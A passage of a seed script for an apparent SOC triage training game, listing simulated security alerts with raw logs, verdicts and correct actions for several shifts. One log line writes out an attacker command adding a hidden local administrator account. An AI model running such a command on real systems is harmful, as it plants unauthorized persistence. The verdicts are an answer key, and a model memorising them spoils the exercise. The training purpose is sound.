      { order: 7, source: "Identity", summary: "Service account authentication failure due to a scheduled password rotation.", rawLog: "svc_batch_export auth failure, matches IT's documented quarterly rotation ticket #5810, new secret not yet deployed to this host.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Known rotation in progress, ticket confirms it." },
      { order: 8, source: "Cloud", summary: "A Lambda function's error rate spiked; unrelated application issue, not security.", rawLog: "checkout-processor error rate 40%, root cause traced to a downstream payment API outage, no auth/permission changes involved.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "An application reliability issue, not a security event — route to the on-call engineering team, not the SOC queue." },
      { order: 9, source: "Email", summary: "Overnight bulk email send from the marketing automation platform.", rawLog: "12,000 emails sent by marketo-svc, matches scheduled campaign 'Q3 Product Update'.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Scheduled, expected volume from a known system." },
      { order: 10, source: "EDR", summary: "A second workstation on the same subnet as the ransomware host now shows the identical encryption behaviour.", rawLog: "FIN-WKS-12 (same subnet as FIN-WKS-11): same unsigned svchost32.exe process, mass file rewrite beginning.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "It's spreading to a second host. This confirms alert #4 absolutely needed escalation, and the response now needs to move fast to contain the subnet." },
      { order: 11, source: "DLP", summary: "Automated backup verification job completed without incident.", rawLog: "Nightly backup-verify job: all checksums passed, no anomalies.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine, clean result." },
      { order: 12, source: "Identity", summary: "An on-call engineer's own emergency login to fix a production issue overnight, ticket filed retroactively.", rawLog: "on-call engineer d.kessler logged into prod-db-02 at 03:40, incident ticket #7710 filed at 04:15 (15 min after the fact) matching the timeline.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Legitimate emergency access, retroactive paperwork is normal practice for genuine incident response and the timeline lines up." },
    ],
  },
  {
    slug: "soc-shift-wednesday-patch",
    title: "Wednesday — Patch Window",
    alerts: [
      { order: 1, source: "EDR", summary: "PowerShell spawned by the SCCM patch deployment agent, matching tonight's change record.", rawLog: "CcmExec.exe -> powershell.exe (patch install script), matches CR-4471 fleet patch deployment 22:00–02:00.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Expected agent, expected behaviour, matches the active change record." },
      { order: 2, source: "Network", summary: "Mass simultaneous reboots across 200 endpoints, matching the scheduled patch window.", rawLog: "200 hosts reboot within 90 seconds of each other, 23:30, matches CR-4471 post-patch reboot phase.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Exactly what a coordinated patch rollout looks like." },
      { order: 3, source: "EDR", summary: "msiexec.exe launched with silent-install flags on 150 hosts within ten minutes.", rawLog: "msiexec.exe /i patch_pkg.msi /quiet across 150 hosts, 22:05-22:15, matches patch batch group A.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Batch install behaviour, matches the deployment plan's group sizing and timing." },
      { order: 4, source: "Identity", summary: "The patch deployment service account authenticating to every managed endpoint in sequence.", rawLog: "svc_sccm_deploy auth events against all 340 fleet hosts, sequential, matches expected deployment agent behaviour.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "This is exactly what the deployment account is supposed to do tonight." },
      { order: 5, source: "EDR", summary: "On one host, the patch agent process spawns an additional binary that isn't part of the patch package manifest.", rawLog: "OPS-WKS-40: CcmExec.exe -> unsigned helper32.exe, not listed in tonight's CR-4471 package manifest.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Every other host is behaving identically — this one has an extra, unsigned binary that doesn't belong to the patch package. Something is riding along with tonight's noise. Escalate." },
      { order: 6, source: "Network", summary: "Firewall change window opened for the patch cycle, matching the change record.", rawLog: "Firewall rule set 'patch-window-temp' activated 22:00, matches CR-4471, scheduled to auto-revert at 02:00.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Documented, time-boxed, matches the change record." },
      { order: 7, source: "Cloud", summary: "Auto-scaling group cycled instances for a rolling patch deployment.", rawLog: "ASG rolling replacement, 8 instances cycled over patch window, matches infra team's documented rolling-patch procedure.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Standard rolling deployment pattern." },
      { order: 8, source: "Identity", summary: "The unsigned binary from the earlier alert creates a new local administrator account on the same host.", rawLog: "OPS-WKS-40: helper32.exe -> net user svc_helper /add && net localgroup administrators svc_helper /add, 22:19.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Same host as the unsigned binary — now it's creating a persistent local admin account. This is the attacker establishing a foothold under cover of patch night. Escalate as a continuation of the same incident." },
      { order: 9, source: "EDR", summary: "Antivirus definitions updated fleet-wide, routine.", rawLog: "AV definitions pulled and applied across the managed fleet, no anomalies.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine maintenance." },
      { order: 10, source: "Web Proxy", summary: "Patch agent downloading packages from the internal WSUS server.", rawLog: "Fleet -> wsus-internal.corp, package downloads matching tonight's manifest.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Expected traffic to internal patch infrastructure." },
      { order: 11, source: "Network", summary: "The compromised host begins an outbound connection to an unfamiliar external IP immediately after the rogue admin account was created.", rawLog: "OPS-WKS-40 -> 194.61.x.x:443, first contact 22:21, two minutes after the svc_helper admin account was created.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "The full chain is now visible: rogue binary, then persistence via a new admin account, then outbound contact to an unknown external host. Escalate this as the real incident hiding inside tonight's patch noise." },
      { order: 12, source: "DLP", summary: "Routine end-of-window compliance scan completed with no anomalies.", rawLog: "Post-patch compliance scan: 339/340 hosts pass baseline (OPS-WKS-40 flagged separately, see EDR alerts).", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Clean result for the rest of the fleet — the one exception is already being tracked under the escalated incident." },
    ],
  },
  {
    slug: "soc-shift-thursday-incident",
    title: "Thursday — Active Incident",
    alerts: [
      { order: 1, source: "Email", summary: "A second employee reports receiving the same phishing email already confirmed against the company earlier today.", rawLog: "u.okafor reports receiving the same 'Invoice Overdue' email confirmed malicious at 10:00 this morning (incident INC-2291).", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Same campaign, already-confirmed active incident — escalate as part of INC-2291, not as a standalone new item." },
      { order: 2, source: "EDR", summary: "One of the earlier phishing-clicking users' machines now shows a newly created scheduled task.", rawLog: "u.beckett (confirmed clicked the link this morning per INC-2291) — new scheduled task 'UpdateHelper' created 14:20.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "This is the incident progressing to persistence on an already-known-affected host. Escalate as an update to INC-2291." },
      { order: 3, source: "Network", summary: "Routine cloud backup sync, unrelated to the ongoing phishing incident.", rawLog: "backup-agent -> cloud-backup-provider.com, matches nightly scheduled sync, no connection to affected hosts.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Unrelated, routine — don't let an active incident make everything look suspicious." },
      { order: 4, source: "Identity", summary: "The already-compromised account attempts to access the payroll system for the first time ever.", rawLog: "u.beckett accesses payroll-app.internal — zero prior access in 14 months of account history.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Lateral movement from the compromised account into a system it's never touched. Escalate as further progression of INC-2291." },
      { order: 5, source: "Web Proxy", summary: "A different employee in an unrelated department browsing general news sites.", rawLog: "u.marchetti (Operations, not on the affected list) -> news sites, no connection to today's incident.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Unrelated user, unrelated activity — resist the urge to tie every alert to the active incident." },
      { order: 6, source: "Email", summary: "A legitimate reply-all thread about an unrelated meeting, flagged only for containing the word 'urgent' in the subject.", rawLog: "Internal thread 'URGENT: room booking conflict Friday', all participants internal and verified, no attachments/links.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Keyword-only match, fully internal and benign content." },
      { order: 7, source: "Network", summary: "Outbound connection from the compromised user's machine to an IP matching the known incident's C2 infrastructure.", rawLog: "u.beckett's workstation -> 91.242.x.x:443, matches C2 IOC already logged against INC-2291.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Direct IOC match to the already-confirmed campaign's infrastructure. Escalate as confirmation of active C2 contact." },
      { order: 8, source: "Identity", summary: "A different, unrelated user resets their own password via self-service.", rawLog: "u.hasegawa self-service password reset, standard flow, no anomaly, no connection to affected accounts.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine self-service action, unrelated user." },
      { order: 9, source: "DLP", summary: "The compromised account attempts to email a spreadsheet of customer records to an external address.", rawLog: "u.beckett -> external address, attachment 'customer_export.xlsx' (2,400 rows of PII), blocked by DLP policy.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Attempted exfiltration of customer PII from the compromised account — this is now the highest-priority item tied to INC-2291. DLP blocked it, but escalate immediately to close out access before a retry succeeds." },
      { order: 10, source: "Cloud", summary: "Routine certificate renewal for an internal service, unrelated to the incident.", rawLog: "TLS cert auto-renewed for internal-api.corp via ACME, standard 90-day cycle, no manual actor involved.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Fully automated, routine, unrelated." },
      { order: 11, source: "EDR", summary: "A third employee's antivirus automatically quarantined the same phishing attachment with no further activity.", rawLog: "u.ferreira: attachment auto-quarantined on open, no process execution followed, matches known-malicious hash from INC-2291.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Exposed to the same campaign but successfully contained automatically — log it against INC-2291 for the exposure count, but it doesn't need its own escalation since AV already stopped it." },
      { order: 12, source: "Web Proxy", summary: "An engineer accessing a competitor's public blog for research, unrelated to the incident.", rawLog: "u.nolan (Engineering) -> competitor's public engineering blog, no connection to affected users or systems.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Ordinary, unrelated browsing activity." },
    ],
  },
  {
    slug: "soc-shift-friday-handover",
    title: "Friday — Pre-Weekend Handover",
    alerts: [
      { order: 1, source: "EDR", summary: "Routine antivirus false positive, safe to close before the weekend.", rawLog: "Heuristic flag on a signed internal tool, self-resolved, no recurrence.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Clear-cut, fully resolved. Nothing to hand over." },
      { order: 2, source: "Identity", summary: "A contractor's access is scheduled to expire automatically over the weekend, per their contract.", rawLog: "c.abara access auto-expiry scheduled Sat 00:00, matches SOW end date on file.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Expected, automatic, documented — no action needed." },
      { order: 3, source: "Network", summary: "A slow, low-volume data transfer pattern that's been building across the whole week, easy to miss on any single day.", rawLog: "RD-WKS-14: ~80MB/day to an external storage endpoint every day this week (Mon-Fri), individually below daily alert thresholds, totals 400MB.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Low-and-slow exfiltration designed to stay under daily thresholds. Cumulative view over the week reveals the real picture — escalate now rather than leaving it for the weekend, when no one is watching daily totals." },
      { order: 4, source: "Email", summary: "A vendor's automated weekly report, expected.", rawLog: "vendorX-reports@vendor.com weekly summary, matches recurring pattern, no attachments beyond the standard PDF.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine, expected." },
      { order: 5, source: "Cloud", summary: "A certificate for an internal tool is expiring this weekend; an ops ticket is already filed.", rawLog: "internal-tool.corp cert expires Sun 23:59, renewal ticket #6690 already in progress, informational only.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Not a security event, and already being handled by ops — no SOC action needed." },
      { order: 6, source: "EDR", summary: "An employee reported their laptop lost as they leave for the weekend; the device still shows as active on VPN.", rawLog: "u.tanaka reported laptop lost 16:50, device SALES-LT-19 shows an active VPN session as of 17:05.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "The device is still reachable right now — escalate immediately to remote-wipe and revoke its credentials before the weekend, while there's still a window to act." },
      { order: 7, source: "Identity", summary: "Routine password-expiry reminder emails sent by IT, unrelated to any incident.", rawLog: "Automated reminder batch to 40 users with passwords expiring in 7 days.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Routine IT communication." },
      { order: 8, source: "Network", summary: "A new, unconfirmed beaconing-like pattern on a low-priority test server; evidence is inconclusive.", rawLog: "TEST-SRV-08 shows irregular outbound connections to a rotating set of IPs, low confidence, insufficient data to confirm C2.", verdict: "FALSE_POSITIVE", correctAction: "MONITOR", explanation: "Not enough evidence to escalate now, but too risky to fully close going into an unstaffed weekend — flag explicitly for the on-call rotation to watch." },
      { order: 9, source: "DLP", summary: "Scheduled Friday backup completed normally.", rawLog: "Weekly full backup job completed, all checksums verified.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Clean, routine." },
      { order: 10, source: "Web Proxy", summary: "An employee's final browsing activity before their offboarding takes effect at 5pm today, matching their normal exit checklist.", rawLog: "u.silva (last day, per HR) — final activity matches standard exit-day checklist tasks (returning equipment portal, benefits site).", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Consistent with a normal, expected departure process." },
      { order: 11, source: "Firewall", summary: "A rule change scheduled to take effect during the weekend maintenance window, documented.", rawLog: "Rule update CR-4522 scheduled for Sat 02:00 maintenance window, change-approved.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Documented and approved change, not a security event." },
      { order: 12, source: "EDR", summary: "The low-and-slow exfiltration host shows one more file-staging event, reinforcing the earlier pattern.", rawLog: "RD-WKS-14: files copied to a temp staging folder immediately before this evening's transfer window.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Further evidence supporting the escalation already raised — make sure this is explicitly included in the handover notes as an active, ongoing item, not something newly discovered." },
    ],
  },
  {
    slug: "soc-shift-weekend-skeleton",
    title: "Weekend — Skeleton Cover",
    alerts: [
      { order: 1, source: "Identity", summary: "Admin login from an unfamiliar country at 03:00 Saturday, no travel record on file.", rawLog: "g.owusu (Domain Admin) login from an unrecognised country, 03:04 Sat, no travel request logged in HR system.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Privileged account, anomalous geography, weekend timing with minimal staff to notice. Escalate immediately." },
      { order: 2, source: "Network", summary: "An internal host scanning an entire subnet for open SMB shares.", rawLog: "WKS-77 sweeping 10.20.5.0/24 on port 445, sequential, all 254 hosts within 4 minutes.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Reconnaissance ahead of lateral movement — exactly the kind of activity attackers time for low-staffing weekends. Escalate." },
      { order: 3, source: "EDR", summary: "Routine scheduled antivirus scan running, no detections.", rawLog: "Weekly full scan, all hosts in batch group C, zero detections.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Clean, scheduled, expected." },
      { order: 4, source: "Email", summary: "An out-of-office autoreply loop between two mail systems, harmless.", rawLog: "Two OOO autoresponders looping 6 times before rate-limiting kicked in, no payload, no external party involved.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Mail-system quirk, no security relevance." },
      { order: 5, source: "Cloud", summary: "A new IAM user created with full administrator permissions, no ticket, weekend timing.", rawLog: "New IAM user 'svc-temp-9921' created with AdministratorAccess, no CR, created 03:20 Sat — 16 minutes after alert #1's login.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Timed immediately after the anomalous admin login — this is the same actor establishing a durable foothold. Escalate as a continuation of alert #1." },
      { order: 6, source: "Network", summary: "The scanning host successfully authenticates to a file server and begins mass file access.", rawLog: "WKS-77 -> FS-CORE, authenticated session, 600+ files accessed across 3 shares within 8 minutes.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "The reconnaissance from alert #2 has turned into successful lateral movement and mass data access. Escalate as active, worsening compromise." },
      { order: 7, source: "DLP", summary: "A large archive file staged in a temp folder on the same host that was scanning and accessing files.", rawLog: "WKS-77: C:\\Temp\\archive_bundle.7z created, 2.3GB, contents match files accessed in alert #6.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "The accessed files are now being staged into a single archive — a strong precursor to exfiltration. Escalate as the same, escalating incident." },
      { order: 8, source: "Web Proxy", summary: "A legitimate SaaS vendor's IP range changed and briefly triggered an outdated allowlist mismatch.", rawLog: "Traffic to knownvendor.com flagged, vendor published an IP range change in their status page yesterday, allowlist not yet updated.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Documented vendor-side change, allowlist just needs updating — not a security concern." },
      { order: 9, source: "Identity", summary: "The compromised admin account disables the EDR agent on three hosts.", rawLog: "g.owusu's session issues an EDR agent-uninstall command against WKS-77, FS-CORE, and BKP-SRV-01.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Defense evasion — the attacker is now blinding endpoint visibility on the hosts they've touched, ahead of a likely next stage. Escalate as critical priority." },
      { order: 10, source: "Network", summary: "Routine weekend database maintenance job, fully documented.", rawLog: "DB-maintenance job on DB-SRV-04, matches recurring Saturday 04:00 index-rebuild schedule.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Expected, scheduled, unrelated." },
      { order: 11, source: "Firewall", summary: "An outbound connection attempt to a domain flagged as a known ransomware operator's leak site.", rawLog: "WKS-77 attempted connection to a domain matching a known ransomware group's leak-site infrastructure, blocked at the perimeter.", verdict: "TRUE_POSITIVE", correctAction: "ESCALATE", explanation: "Contact attempted toward known ransomware-adjacent infrastructure from the already-compromised host — this points toward the incident heading into a ransomware deployment stage. Highest priority of the shift; escalate now." },
      { order: 12, source: "EDR", summary: "The on-call analyst's own remote access session, verified via callback confirmation.", rawLog: "on-call analyst m.reyes VPN + jump-host session, verified live via phone callback before granting queue access.", verdict: "FALSE_POSITIVE", correctAction: "CLOSE", explanation: "Verified directly with the analyst themself — legitimate access." },
    ],
  },
];

async function main() {
  let totalAlerts = 0;
  for (const s of SHIFTS) {
    const shift = await db.socShift.findUnique({ where: { slug: s.slug } });
    if (!shift) {
      console.error(`Skipping ${s.slug} — shift not found. Was it renamed?`);
      continue;
    }

    if (s.briefing) {
      await db.socShift.update({ where: { id: shift.id }, data: { briefing: s.briefing } });
    }

    await db.shiftAlert.deleteMany({ where: { shiftId: shift.id } });
    await db.shiftAlert.createMany({
      data: s.alerts.map((a) => ({ ...a, shiftId: shift.id })),
    });

    totalAlerts += s.alerts.length;
    console.log(`${s.title}: ${s.alerts.length} alerts seeded`);
  }
  console.log(`\nDone — ${totalAlerts} alerts across ${SHIFTS.length} shifts.`);
  process.exit(0);
}

main();
